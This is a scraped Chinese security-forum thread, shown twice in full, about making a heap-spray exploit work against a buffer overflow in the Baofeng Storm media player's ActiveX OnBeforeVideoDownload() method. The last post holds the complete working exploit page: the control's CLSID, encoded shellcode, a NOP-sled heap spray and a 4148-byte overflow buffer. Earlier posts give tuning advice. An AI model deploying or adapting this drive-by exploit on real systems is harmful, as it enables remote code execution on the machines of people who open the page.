[求助][求助]暴风影音<3.9.4.17 OnBeforeVideoDownload（）函数溢出测试-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

最新回复 (9)
boainfall 雪币： 116 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 10 回帖 398 粉丝 0 关注私信	boainfall 2011-1-20 02:04 2 楼 0 貌似是0c么
plaintea 雪币： 23 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 23 粉丝 0 关注私信	plaintea 2011-1-20 09:42 3 楼 0 这年头谁还用暴风影音啊，那简直是广告发布器。
huihuiqi 雪币： 275 活跃值： (55) 能力值： ( LV2，RANK：10 ) 在线值：发帖 17 回帖 105 粉丝 0 关注私信	huihuiqi 2011-1-20 10:21 4 楼 0 我觉得是因为你heap spray的内存范围不够，0x0a0a0a0a还没到达你spray的那片地址，你让你同学自己跟一下，看看是不是这个原因！
PEBOSS 雪币： 33 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 147 回帖 858 粉丝 0 关注私信	PEBOSS 2011-1-20 16:22 5 楼 0 暴风影音又有新漏洞?
高亮雪币： 171 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 87 粉丝 0 关注私信	高亮 2011-1-21 10:07 6 楼 0 谢huihuiqi兄，heap spray内存增大后，依旧不行，参考三根火柴的http://kssd.pediy.com/pediy10/98693.html 本地测试还是不行俺那同学在郁闷中。
高亮雪币： 171 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 87 粉丝 0 关注私信	高亮 2011-1-21 10:08 7 楼 0 只要heap spray空间到位，感觉0a 0c一样的，不是吗？
huihuiqi 雪币： 275 活跃值： (55) 能力值： ( LV2，RANK：10 ) 在线值：发帖 17 回帖 105 粉丝 0 关注私信	huihuiqi 2011-1-21 10:30 8 楼 0 内存增大了多少？你heap spray了多少个内存块，每个内存块的大小是多少？
huihuiqi 雪币： 275 活跃值： (55) 能力值： ( LV2，RANK：10 ) 在线值：发帖 17 回帖 105 粉丝 0 关注私信	huihuiqi 2011-1-21 10:35 9 楼 0 看样子是200个块，估计不太够哦~！另外metasploit里有类似的利用代码，可以研究下！
高亮雪币： 171 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 87 粉丝 0 关注私信	高亮 2011-1-21 20:38 10 楼 0 感谢huihuiqi一直关注代码调试好了 <html> <object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id='target'></object> <body> <SCRIPT language="javascript"> //var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); var shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+ '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+ '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+ '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+ '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+ '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'); nops=unescape('%u9090%u9090'); headersize =20; slackspace= headersize + shellcode.length; while(nops.length < slackspace) nops+= nops; fillblock= nops.substring(0, slackspace); block= nops.substring(0, nops.length- slackspace); while( block.length+ slackspace<0x40000) block= block+ block+ fillblock; memory=new Array(); for (x=0; x<300; x++) memory[x] = block + shellcode; var buffer = ''; //这里为4148即可，不需要那么繁琐的计算 while (buffer.length < 4148) buffer+=unescape('\x0c\x0c\x0c\x0c'); target.OnBeforeVideoDownload(buffer); </script> </body> </html>
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

最新回复 (9)
boainfall 雪币： 116 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 10 回帖 398 粉丝 0 关注私信	boainfall 2011-1-20 02:04 2 楼 0 貌似是0c么
plaintea 雪币： 23 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 23 粉丝 0 关注私信	plaintea 2011-1-20 09:42 3 楼 0 这年头谁还用暴风影音啊，那简直是广告发布器。
huihuiqi 雪币： 275 活跃值： (55) 能力值： ( LV2，RANK：10 ) 在线值：发帖 17 回帖 105 粉丝 0 关注私信	huihuiqi 2011-1-20 10:21 4 楼 0 我觉得是因为你heap spray的内存范围不够，0x0a0a0a0a还没到达你spray的那片地址，你让你同学自己跟一下，看看是不是这个原因！
PEBOSS 雪币： 33 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 147 回帖 858 粉丝 0 关注私信	PEBOSS 2011-1-20 16:22 5 楼 0 暴风影音又有新漏洞?
高亮雪币： 171 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 87 粉丝 0 关注私信	高亮 2011-1-21 10:07 6 楼 0 谢huihuiqi兄，heap spray内存增大后，依旧不行，参考三根火柴的http://kssd.pediy.com/pediy10/98693.html 本地测试还是不行俺那同学在郁闷中。
高亮雪币： 171 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 87 粉丝 0 关注私信	高亮 2011-1-21 10:08 7 楼 0 只要heap spray空间到位，感觉0a 0c一样的，不是吗？
huihuiqi 雪币： 275 活跃值： (55) 能力值： ( LV2，RANK：10 ) 在线值：发帖 17 回帖 105 粉丝 0 关注私信	huihuiqi 2011-1-21 10:30 8 楼 0 内存增大了多少？你heap spray了多少个内存块，每个内存块的大小是多少？
huihuiqi 雪币： 275 活跃值： (55) 能力值： ( LV2，RANK：10 ) 在线值：发帖 17 回帖 105 粉丝 0 关注私信	huihuiqi 2011-1-21 10:35 9 楼 0 看样子是200个块，估计不太够哦~！另外metasploit里有类似的利用代码，可以研究下！
高亮雪币： 171 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 87 粉丝 0 关注私信	高亮 2011-1-21 20:38 10 楼 0 感谢huihuiqi一直关注代码调试好了 <html> <object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id='target'></object> <body> <SCRIPT language="javascript"> //var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); var shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+ '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+ '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+ '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+ '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+ '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'); nops=unescape('%u9090%u9090'); headersize =20; slackspace= headersize + shellcode.length; while(nops.length < slackspace) nops+= nops; fillblock= nops.substring(0, slackspace); block= nops.substring(0, nops.length- slackspace); while( block.length+ slackspace<0x40000) block= block+ block+ fillblock; memory=new Array(); for (x=0; x<300; x++) memory[x] = block + shellcode; var buffer = ''; //这里为4148即可，不需要那么繁琐的计算 while (buffer.length < 4148) buffer+=unescape('\x0c\x0c\x0c\x0c'); target.OnBeforeVideoDownload(buffer); </script> </body> </html>
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复